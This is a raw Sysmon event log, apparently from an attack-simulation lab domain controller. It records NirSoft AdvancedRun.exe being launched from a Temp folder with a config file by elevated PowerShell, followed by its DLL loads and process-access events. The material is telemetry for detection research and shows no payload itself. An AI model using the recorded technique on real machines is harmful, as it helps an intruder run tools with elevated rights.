18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004011372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004011370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.724{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004011242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:36.645{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000004011234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
